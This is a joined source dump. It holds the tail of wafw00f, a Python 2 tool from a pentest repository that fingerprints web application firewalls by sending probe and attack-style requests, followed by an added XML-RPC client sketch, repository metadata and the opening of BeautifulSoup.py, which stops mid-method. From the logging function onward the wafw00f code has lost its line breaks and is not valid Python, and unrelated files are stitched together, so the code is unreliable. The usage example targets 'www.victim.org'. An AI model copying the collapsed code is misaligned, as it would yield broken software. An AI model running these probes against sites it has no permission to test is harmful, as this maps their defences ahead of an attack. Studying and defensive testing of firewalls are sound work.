    def isnetscaler(self):
        """
        First checks if a cookie associated with Netscaler is present,
        if not it will try to find if a "Cneonction" or "nnCoection" is returned
        for any of the attacks sent
        """
        # NSC_ and citrix_ns_id come from David S. Langlands <dsl 'at' surfstar.com>
        if self.matchcookie('^(ns_af=|citrix_ns_id|NSC_)'):
            return True
        if self.matchheader(('Cneonction', 'close'), attack=True):
            return True
        if self.matchheader(('nnCoection', 'close'), attack=True):
            return True
        return False

    def isurlscan(self):
        detected = False
        testheaders = dict()
        testheaders['Translate'] = 'z' * 10
        testheaders['If'] = 'z' * 10
        testheaders['Lock-Token'] = 'z' * 10
        testheaders['Transfer-Encoding'] = 'z' * 10
        r = self.normalrequest()
        if r is None:
            return
        response, _tmp = r
        r = self.normalrequest(headers=testheaders)
        if r is None:
            return
        response2, _tmp = r
        if response.status != response2.status:
            if response2.status == 404:
                detected = True
        return detected

    def iswebscurity(self):
        detected = False
        r = self.normalrequest()
        if r is None:
            return
        response, responsebody = r
        if response.status == 403:
            return detected
        newpath = self.path + '?nx=@@'
        r = self.request(path=newpath)
        if r is None:
            return
        response, responsebody = r
        if response.status == 403:
            detected = True
        return detected

    def isdotdefender(self):
        # thanks to j0e
        return self.matchheader(['X-dotDefender-denied', '^1$'], attack=True)

    def isimperva(self):
        # thanks to Mathieu Dessus <mathieu.dessus(a)verizonbusiness.com> for this
        # might lead to false positives so please report back to sandro@enablesecurity.com
        for attack in self.attacks:
            r = attack(self)
            if r is None:
                return
            response, responsebody = r
            if response.version == 10:
                return True
        return False

    def ismodsecuritypositive(self):
        import random
        detected = False
        self.normalrequest(usecache=False, cacheresponse=False)
        randomfn = self.path + str(random.randrange(1000, 9999)) + '.html'
        r = self.request(path=randomfn)
        if r is None:
            return
        response, responsebody = r
        if response.status != 302:
            return False
        randomfnnull = randomfn + '%00'
        r = self.request(path=randomfnnull)
        if r is None:
            return
        response, responsebody = r
        if response.status == 404:
            detected = True
        return detected

    wafdetections = dict()
    # easy ones
    wafdetections['Profense'] = isprofense
    wafdetections['ModSecurity'] = ismodsecurity
    wafdetections['NetContinuum'] = isnetcontinuum
    wafdetections['HyperGuard'] = ishyperguard
    wafdetections['Barracuda'] = isbarracuda
    wafdetections['Airlock'] = isairlock
    wafdetections['BinarySec'] = isbinarysec
    wafdetections['F5 Trafficshield'] = isf5trafficshield
    wafdetections['F5 ASM'] = isf5asm
    wafdetections['Teros'] = isteros
    wafdetections['DenyALL'] = isdenyall
    wafdetections['BIG-IP'] = isbigip
    wafdetections['Citrix NetScaler'] = isnetscaler
    # lil bit more complex
    wafdetections['webApp.secure'] = iswebscurity
    wafdetections['WebKnight'] = iswebknight
    wafdetections['URLScan'] = isurlscan
    wafdetections['SecureIIS'] = issecureiis
    wafdetections['dotDefender'] = isdotdefender
    #wafdetections['BeeWare'] = isbeeware
    # wafdetections['ModSecurity (positive model)'] = ismodsecuritypositive removed for now
    wafdetections['Imperva'] = isimperva
    wafdetectionsprio = ['Profense', 'NetContinuum',
                         'Barracuda', 'HyperGuard', 'BinarySec', 'Teros',
                         'F5 Trafficshield', 'F5 ASM', 'Airlock', 'Citrix NetScaler',
                         'ModSecurity', 'DenyALL',
                         'dotDefender', 'webApp.secure',
                         # removed for now 'ModSecurity (positive model)',
                         'BIG-IP', 'URLScan', 'WebKnight',
                         'SecureIIS', 'Imperva']

    def identwaf(self, findall=False):
        detected = list()
        for wafvendor in self.wafdetectionsprio:
            self.log.info('Checking for %s' % wafvendor)
            if self.wafdetections[wafvendor](self):
                detected.append(wafvendor)
                if not findall:
                    break
        self.knowledge['wafname'] = detected
        return detected

def calclogginglevel(verbosity):
    default = 40 # errors are printed out
level = default - (verbosity*10) if level < 0: level = 0 return level class wafwoof_api: def __init__(self): self.cache = dict() def vendordetect(self,url,findall=False): if self.cache.has_key(url): wafw00f = self.cache[url] else: r = oururlparse(url) if r is None: return [''] (hostname,port,path,query,ssl) = r wafw00f = WafW00F(target=hostname,port=port,path=path,ssl=ssl) self.cache[url] = wafw00f return wafw00f.identwaf(findall=findall) def genericdetect(self,url): if self.cache.has_key(url): wafw00f = self.cache[url] else: r = oururlparse(url) if r is None: return {} (hostname,port,path,query,ssl) = r wafw00f = WafW00F(target=hostname,port=port,path=path,ssl=ssl) self.cache[url] = wafw00f wafw00f.genericdetect() return wafw00f.knowledge['generic'] def alltests(self,url,findall=False): if self.cache.has_key(url): wafw00f = self.cache[url] else: r = oururlparse(url) if r is None: return {} (hostname,port,path,query,ssl) = r wafw00f = WafW00F(target=hostname,port=port,path=path,ssl=ssl) self.cache[url] = wafw00f wafw00f.identwaf(findall=findall) if (len(wafw00f.knowledge['wafname']) == 0) or (findall): wafw00f.genericdetect() return wafw00f.knowledge def xmlrpc_interface(bindaddr=('localhost',8001)): from SimpleXMLRPCServer import SimpleXMLRPCServer from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler class RequestHandler(SimpleXMLRPCRequestHandler): rpc_paths = ('/RPC2',) server = SimpleXMLRPCServer(bindaddr, requestHandler=RequestHandler) server.register_introspection_functions() server.register_instance(wafwoof_api()) try: server.serve_forever() except KeyboardInterrupt: print "bye!" return def main(): print lackofart parser = OptionParser(usage="""%prog url1 [url2 [url3 ... ]]\r\nexample: %prog http://www.victim.org/""") parser.add_option('-v','--verbose',action='count', dest='verbose', default=0, help="enable verbosity - multiple -v options increase verbosity") parser.add_option('-a','--findall',action='store_true', dest='findall', default=False, help="Find all WAFs, do not stop testing on the first one") parser.add_option('-r','--disableredirect',action='store_false',dest='followredirect', default=True, help='Do not follow redirections given by 3xx responses') parser.add_option('-t','--test',dest='test', help='Test for one specific WAF') parser.add_option('-l','--list',dest='list', action='store_true', default=False,help='List all WAFs that we are able to detect') parser.add_option('--xmlrpc',dest='xmlrpc', action='store_true', default=False,help='Switch on the XML-RPC interface instead of CUI') parser.add_option('--xmlrpcport',dest='xmlrpcport', type='int', default=8001,help='Specify an alternative port to listen on, default 8001') parser.add_option('--version','-V',dest='version', action='store_true', default=False,help='Print out the version') options,args = parser.parse_args() logging.basicConfig(level=calclogginglevel(options.verbose+1)) log = logging.getLogger() if options.list: print "Can test for these WAFs:\r\n" attacker = WafW00F(None) print '\r\n'.join(attacker.wafdetectionsprio) return if options.version: print 'WAFW00F version %s' % __version__ return elif options.xmlrpc: print "Starting XML-RPC interface" xmlrpc_interface(bindaddr=('localhost',options.xmlrpcport)) return if len(args) == 0: parser.error("we need a target site") targets = args for target in targets: print "Checking %s" % target pret = oururlparse(target) if pret is None: log.critical('The url %s is not well formed' % target) sys.exit(1) (hostname,port,path,query,ssl) = pret log.info('starting wafw00f 
on %s' % target) attacker = WafW00F(hostname,port=port,ssl=ssl, debuglevel=options.verbose,path=path, followredirect=options.followredirect) if attacker.normalrequest() is None: log.error('Site %s appears to be down' % target) sys.exit(1) if options.test: if attacker.wafdetections.has_key(options.test): waf = attacker.wafdetections[options.test](attacker) if waf: print "The site %s is behind a %s" % (target, options.test) else: print "WAF %s was not detected on %s" % (options.test,target) else: print "WAF %s was not found in our list\r\nUse the --list option to see what is available" % options.test return waf = attacker.identwaf(options.findall) log.info('Ident WAF: %s' % waf) if len(waf) > 0: print 'The site %s is behind a %s' % (target, ' and/or '.join( waf)) if (options.findall) or len(waf) == 0: print 'Generic Detection results:' if attacker.genericdetect(): log.info('Generic Detection: %s' % attacker.knowledge['generic']['reason']) print 'The site %s seems to be behind a WAF ' % target print 'Reason: %s' % attacker.knowledge['generic']['reason'] else: print 'No WAF detected by the generic detection' print 'Number of requests: %s' % attacker.requestnumber if __name__ == '__main__': if sys.hexversion < 0x2040000: sys.stderr.write('Your version of python is way too old .. please update to 2.4 or later\r\n') main()
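# --- Illustrative usage sketch (not part of the original wafw00f source) ---
# A minimal Python 2 XML-RPC client for the wafwoof_api instance registered
# above when the script is started with --xmlrpc. The endpoint, port, and
# target URL are placeholder assumptions; vendordetect, genericdetect, and
# alltests are the only methods exposed by the registered instance.
import xmlrpclib

def query_wafw00f(url, endpoint='http://localhost:8001/RPC2'):
    """Ask a running `wafw00f --xmlrpc` instance about a single target URL."""
    proxy = xmlrpclib.ServerProxy(endpoint)
    vendors = proxy.vendordetect(url)     # list of identified WAF names
    generic = proxy.genericdetect(url)    # dict with 'found' and 'reason' keys
    return vendors, generic

# Example (assumes the server is already listening):
#   vendors, generic = query_wafw00f('http://www.victim.org/')
#   print vendors, generic.get('reason')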
size: 26,009
language: Python
extension: .py
total_lines: 585
avg_line_length: 32.967521
max_line_length: 130
alphanum_fraction: 0.596721
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)
id: 18,908
file_name: BeautifulSoup.py
file_path: pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/BeautifulSoup.py
"""Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2008, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. 
""" from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" __version__ = "3.0.7a" __copyright__ = "Copyright (c) 2004-2008 Leonard Richardson" __license__ = "New-style BSD" from sgmllib import SGMLParser, SGMLParseError import codecs import markupbase import types import re import sgmllib try: from htmlentitydefs import name2codepoint except ImportError: name2codepoint = {} try: set except NameError: from sets import Set as set #These hacks make Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match DEFAULT_OUTPUT_ENCODING = "utf-8" # First, the classes that represent markup elements. class PageElement: """Contains the navigational information for some part of the page (either a tag or a piece of text)""" def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" self.parent = parent self.previous = previous self.next = None self.previousSibling = None self.nextSibling = None if self.parent and self.parent.contents: self.previousSibling = self.parent.contents[-1] self.previousSibling.nextSibling = self def replaceWith(self, replaceWith): oldParent = self.parent myIndex = self.parent.contents.index(self) if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent: # We're replacing this element with one of its siblings. index = self.parent.contents.index(replaceWith) if index and index < myIndex: # Furthermore, it comes before this element. That # means that when we extract it, the index of this # element will change. myIndex = myIndex - 1 self.extract() oldParent.insert(myIndex, replaceWith) def extract(self): """Destructively rips this element out of the tree.""" if self.parent: try: self.parent.contents.remove(self) except ValueError: pass #Find the two elements that would be next to each other if #this element (and any children) hadn't been parsed. Connect #the two. lastChild = self._lastRecursiveChild() nextElement = lastChild.next if self.previous: self.previous.next = nextElement if nextElement: nextElement.previous = self.previous self.previous = None lastChild.next = None self.parent = None if self.previousSibling: self.previousSibling.nextSibling = self.nextSibling if self.nextSibling: self.nextSibling.previousSibling = self.previousSibling self.previousSibling = self.nextSibling = None return self def _lastRecursiveChild(self): "Finds the last element beneath this object to be parsed." lastChild = self while hasattr(lastChild, 'contents') and lastChild.contents: lastChild = lastChild.contents[-1] return lastChild def insert(self, position, newChild): if (isinstance(newChild, basestring) or isinstance(newChild, unicode)) \ and not isinstance(newChild, NavigableString): newChild = NavigableString(newChild) position = min(position, len(self.contents)) if hasattr(newChild, 'parent') and newChild.parent != None: # We're 'inserting' an element that's already one # of this object's children. if newChild.parent == self: index = self.find(newChild) if index and index < position: # Furthermore we're moving it further down the # list of this object's children. That means that # when we extract this element, our target index # will jump down one. 
position = position - 1 newChild.extract() newChild.parent = self previousChild = None if position == 0: newChild.previousSibling = None newChild.previous = self else: previousChild = self.contents[position-1] newChild.previousSibling = previousChild newChild.previousSibling.nextSibling = newChild newChild.previous = previousChild._lastRecursiveChild() if newChild.previous: newChild.previous.next = newChild newChildsLastElement = newChild._lastRecursiveChild() if position >= len(self.contents): newChild.nextSibling = None parent = self parentsNextSibling = None while not parentsNextSibling: parentsNextSibling = parent.nextSibling parent = parent.parent if not parent: # This is the last element in the document. break if parentsNextSibling: newChildsLastElement.next = parentsNextSibling else: newChildsLastElement.next = None else: nextChild = self.contents[position] newChild.nextSibling = nextChild if newChild.nextSibling: newChild.nextSibling.previousSibling = newChild newChildsLastElement.next = nextChild if newChildsLastElement.next: newChildsLastElement.next.previous = newChildsLastElement self.contents.insert(position, newChild) def append(self, tag): """Appends the given tag to the contents of this tag.""" self.insert(len(self.contents), tag) def findNext(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findAllNext, name, attrs, text, **kwargs) def findAllNext(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextGenerator, **kwargs) def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findNextSiblings, name, attrs, text, **kwargs) def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextSiblingGenerator, **kwargs) fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x def findPrevious(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousGenerator, **kwargs) fetchPrevious = findAllPrevious # Compatibility with pre-3.x def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findPreviousSiblings, name, attrs, text, **kwargs) def findPreviousSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousSiblingGenerator, **kwargs) fetchPreviousSiblings = findPreviousSiblings # Compatibility with 
pre-3.x def findParent(self, name=None, attrs={}, **kwargs): """Returns the closest parent of this Tag that matches the given criteria.""" # NOTE: We can't use _findOne because findParents takes a different # set of arguments. r = None l = self.findParents(name, attrs, 1) if l: r = l[0] return r def findParents(self, name=None, attrs={}, limit=None, **kwargs): """Returns the parents of this Tag that match the given criteria.""" return self._findAll(name, attrs, None, limit, self.parentGenerator, **kwargs) fetchParents = findParents # Compatibility with pre-3.x #These methods do the real heavy lifting. def _findOne(self, method, name, attrs, text, **kwargs): r = None l = method(name, attrs, text, 1, **kwargs) if l: r = l[0] return r def _findAll(self, name, attrs, text, limit, generator, **kwargs): "Iterates over a generator looking for things that match." if isinstance(name, SoupStrainer): strainer = name else: # Build a SoupStrainer strainer = SoupStrainer(name, attrs, text, **kwargs) results = ResultSet(strainer) g = generator() while True: try: i = g.next() except StopIteration: break if i: found = strainer.search(i) if found: results.append(found) if limit and len(results) >= limit: break return results #These Generators can be used to navigate starting from both #NavigableStrings and Tags. def nextGenerator(self): i = self while i: i = i.next yield i def nextSiblingGenerator(self): i = self while i: i = i.nextSibling yield i def previousGenerator(self): i = self while i: i = i.previous yield i def previousSiblingGenerator(self): i = self while i: i = i.previousSibling yield i def parentGenerator(self): i = self while i: i = i.parent yield i # Utility methods def substituteEncoding(self, str, encoding=None): encoding = encoding or "utf-8" return str.replace("%SOUP-ENCODING%", encoding) def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" if isinstance(s, unicode): if encoding: s = s.encode(encoding) elif isinstance(s, str): if encoding: s = s.encode(encoding) else: s = unicode(s) else: if encoding: s = self.toEncoding(str(s), encoding) else: s = unicode(s) return s class NavigableString(unicode, PageElement): def __new__(cls, value): """Create a new NavigableString. When unpickling a NavigableString, this method is called with the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be passed in to the superclass's __new__ or the superclass won't know how to handle non-ASCII characters. """ if isinstance(value, unicode): return unicode.__new__(cls, value) return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING) def __getnewargs__(self): return (NavigableString.__str__(self),) def __getattr__(self, attr): """text.string gives you text. 
This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.""" if attr == 'string': return self else: raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): if encoding: return self.encode(encoding) else: return self class CData(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding) class ProcessingInstruction(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): output = self if "%SOUP-ENCODING%" in output: output = self.substituteEncoding(output, encoding) return "<?%s?>" % self.toEncoding(output, encoding) class Comment(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!--%s-->" % NavigableString.__str__(self, encoding) class Declaration(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!%s>" % NavigableString.__str__(self, encoding) class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" def _invert(h): "Cheap function to invert a hash." i = {} for k,v in h.items(): i[v] = k return i XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", "quot" : '"', "amp" : "&", "lt" : "<", "gt" : ">" } XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" x = match.group(1) if self.convertHTMLEntities and x in name2codepoint: return unichr(name2codepoint[x]) elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: if self.convertXMLEntities: return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] else: return u'&%s;' % x elif len(x) > 0 and x[0] == '#': # Handle numeric entities if len(x) > 1 and x[1] == 'x': return unichr(int(x[2:], 16)) else: return unichr(int(x[1:])) elif self.escapeUnrecognizedEntities: return u'&amp;%s;' % x else: return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): "Basic constructor." # We don't actually store the parser object: that lets extracted # chunks be garbage-collected self.parserClass = parser.__class__ self.isSelfClosing = parser.isSelfClosingTag(name) self.name = name if attrs == None: attrs = [] self.attrs = attrs self.contents = [] self.setup(parent, previous) self.hidden = False self.containsSubstitutions = False self.convertHTMLEntities = parser.convertHTMLEntities self.convertXMLEntities = parser.convertXMLEntities self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. convert = lambda(k, val): (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", self._convertEntities, val)) self.attrs = map(convert, self.attrs) def get(self, key, default=None): """Returns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.""" return self._getAttrMap().get(key, default) def has_key(self, key): return self._getAttrMap().has_key(key) def __getitem__(self, key): """tag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.""" return self._getAttrMap()[key] def __iter__(self): "Iterating over a tag iterates over its contents." 
return iter(self.contents) def __len__(self): "The length of a tag is the length of its list of contents." return len(self.contents) def __contains__(self, x): return x in self.contents def __nonzero__(self): "A tag is non-None even if it has no contents." return True def __setitem__(self, key, value): """Setting tag[key] sets the value of the 'key' attribute for the tag.""" self._getAttrMap() self.attrMap[key] = value found = False for i in range(0, len(self.attrs)): if self.attrs[i][0] == key: self.attrs[i] = (key, value) found = True if not found: self.attrs.append((key, value)) self._getAttrMap()[key] = value def __delitem__(self, key): "Deleting tag[key] deletes all 'key' attributes for the tag." for item in self.attrs: if item[0] == key: self.attrs.remove(item) #We don't break because bad HTML can define the same #attribute multiple times. self._getAttrMap() if self.attrMap.has_key(key): del self.attrMap[key] def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" return apply(self.findAll, args, kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?""" if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): return False for i in range(0, len(self.contents)): if self.contents[i] != other.contents[i]: return False return True def __ne__(self, other): """Returns true iff this tag is not identical to the other tag, as defined in __eq__.""" return not self == other def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): """Renders this tag as a string.""" return self.__str__(encoding) def __unicode__(self): return self.__str__(None) BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + ")") def _sub_entity(self, x): """Used with a regular expression to substitute the appropriate XML entity for an XML special character.""" return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.""" encodedName = self.toEncoding(self.name, encoding) attrs = [] if self.attrs: for key, val in self.attrs: fmt = '%s="%s"' if isString(val): if self.containsSubstitutions and '%SOUP-ENCODING%' in val: val = self.substituteEncoding(val, encoding) # The attribute value either: # # * Contains no embedded double quotes or single quotes. # No problem: we enclose it in double quotes. # * Contains embedded single quotes. No problem: # double quotes work here too. # * Contains embedded double quotes. No problem: # we enclose it in single quotes. # * Embeds both single _and_ double quotes. 
This # can't happen naturally, but it can happen if # you modify an attribute value after parsing # the document. Now we have a bit of a # problem. We solve it by enclosing the # attribute in single quotes, and escaping any # embedded single quotes to XML entities. if '"' in val: fmt = "%s='%s'" if "'" in val: # TODO: replace with apos when # appropriate. val = val.replace("'", "&squot;") # Now we're okay w/r/t quotes. But the attribute # value might also contain angle brackets, or # ampersands that aren't part of entities. We need # to escape those to XML entities too. val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) attrs.append(fmt % (self.toEncoding(key, encoding), self.toEncoding(val, encoding))) close = '' closeTag = '' if self.isSelfClosing: close = ' /' else: closeTag = '</%s>' % encodedName indentTag, indentContents = 0, 0 if prettyPrint: indentTag = indentLevel space = (' ' * (indentTag-1)) indentContents = indentTag + 1 contents = self.renderContents(encoding, prettyPrint, indentContents) if self.hidden: s = contents else: s = [] attributeString = '' if attrs: attributeString = ' ' + ' '.join(attrs) if prettyPrint: s.append(space) s.append('<%s%s%s>' % (encodedName, attributeString, close)) if prettyPrint: s.append("\n") s.append(contents) if prettyPrint and contents and contents[-1] != "\n": s.append("\n") if prettyPrint and closeTag: s.append(space) s.append(closeTag) if prettyPrint and closeTag and self.nextSibling: s.append("\n") s = ''.join(s) return s def decompose(self): """Recursively destroys the contents of this tree.""" contents = [i for i in self.contents] for i in contents: if isinstance(i, Tag): i.decompose() else: i.extract() self.extract() def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): return self.__str__(encoding, True) def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..""" s=[] for c in self: text = None if isinstance(c, NavigableString): text = c.__str__(encoding) elif isinstance(c, Tag): s.append(c.__str__(encoding, prettyPrint, indentLevel)) if text and prettyPrint: text = text.strip() if text: if prettyPrint: s.append(" " * (indentLevel-1)) s.append(text) if prettyPrint: s.append("\n") return ''.join(s) #Soup methods def find(self, name=None, attrs={}, recursive=True, text=None, **kwargs): """Return only the first child of this Tag matching the given criteria.""" r = None l = self.findAll(name, attrs, recursive, text, 1, **kwargs) if l: r = l[0] return r findChild = find def findAll(self, name=None, attrs={}, recursive=True, text=None, limit=None, **kwargs): """Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. 
The same is true of the tag name.""" generator = self.recursiveChildGenerator if not recursive: generator = self.childGenerator return self._findAll(name, attrs, text, limit, generator, **kwargs) findChildren = findAll # Pre-3.x compatibility methods first = find fetch = findAll def fetchText(self, text=None, recursive=True, limit=None): return self.findAll(text=text, recursive=recursive, limit=limit) def firstText(self, text=None, recursive=True): return self.find(text=text, recursive=recursive) #Private methods def _getAttrMap(self): """Initializes a map representation of this tag's attributes, if not already initialized.""" if not getattr(self, 'attrMap'): self.attrMap = {} for (key, value) in self.attrs: self.attrMap[key] = value return self.attrMap #Generator methods def childGenerator(self): for i in range(0, len(self.contents)): yield self.contents[i] raise StopIteration def recursiveChildGenerator(self): stack = [(self, 0)] while stack: tag, start = stack.pop() if isinstance(tag, Tag): for i in range(start, len(tag.contents)): a = tag.contents[i] yield a if isinstance(a, Tag) and tag.contents: if i < len(tag.contents) - 1: stack.append((tag, i+1)) stack.append((a, 0)) break raise StopIteration # Next, a couple classes to represent queries and their results. class SoupStrainer: """Encapsulates a number of ways of matching a markup element (tag or text).""" def __init__(self, name=None, attrs={}, text=None, **kwargs): self.name = name if isString(attrs): kwargs['class'] = attrs attrs = None if kwargs: if attrs: attrs = attrs.copy() attrs.update(kwargs) else: attrs = kwargs self.attrs = attrs self.text = text def __str__(self): if self.text: return self.text else: return "%s|%s" % (self.name, self.attrs) def searchTag(self, markupName=None, markupAttrs={}): found = None markup = None if isinstance(markupName, Tag): markup = markupName markupAttrs = markup callFunctionWithTagData = callable(self.name) \ and not isinstance(markupName, Tag) if (not self.name) \ or callFunctionWithTagData \ or (markup and self._matches(markup, self.name)) \ or (not markup and self._matches(markupName, self.name)): if callFunctionWithTagData: match = self.name(markupName, markupAttrs) else: match = True markupAttrMap = None for attr, matchAgainst in self.attrs.items(): if not markupAttrMap: if hasattr(markupAttrs, 'get'): markupAttrMap = markupAttrs else: markupAttrMap = {} for k,v in markupAttrs: markupAttrMap[k] = v attrValue = markupAttrMap.get(attr) if not self._matches(attrValue, matchAgainst): match = False break if match: if markup: found = markup else: found = markupName return found def search(self, markup): #print 'looking for %s in %s' % (self, markup) found = None # If given a list of items, scan it for a text element that # matches. if isList(markup) and not isinstance(markup, Tag): for element in markup: if isinstance(element, NavigableString) \ and self.search(element): found = element break # If it's a Tag, make sure its name or attributes match. # Don't bother with Tags if we're searching for text. elif isinstance(markup, Tag): if not self.text: found = self.searchTag(markup) # If it's text, make sure the text matches. 
